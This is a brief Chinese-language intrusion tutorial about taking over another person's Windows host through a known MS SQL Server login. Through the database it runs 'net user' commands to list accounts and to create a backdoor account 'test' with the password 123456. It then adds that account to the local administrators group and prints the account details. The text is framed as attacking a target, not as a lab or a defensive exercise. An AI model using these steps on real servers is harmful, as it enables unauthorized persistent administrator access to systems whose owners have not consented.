从Mssql入手侵入对方主机

假设知道了对方Ms SQL Server的用户名和密码：

 

连上了，接下来可以执行一些dos命令。

net user查看下用户：

 

执行

net user test 123456 /add

添加一个用户test密码为123456

下面执行 net user test

查看下帐号test的详细信息：

 

 

用户名                 test 
 
全名                    
 
注释                    
 
用户的注释              
 
国家(地区)代码         000 (系统默认值) 
 
帐户启用               Yes 
 
帐户到期               从不 
 
 
 
上次设置密码           2011/1/4 下午 10:01 
 
密码到期               2011/2/16 下午 08:49 
 
密码可更改             2011/1/4 下午 10:01 
 
需要密码               Yes 
 
用户可以更改密码       Yes 
 
 
 
允许的工作站           All 
 
登录脚本                
 
用户配置文件            
 
主目录                  
 
上次登录               从不 
 
 
 
可允许的登录小时数     All 
 
 
 
本地组成员             *Users                 
 
全局组成员             *None                  
 
命令成功完成。 

 

现在把他加入管理员组 net localgroup administrators test /add

net user test再查看下。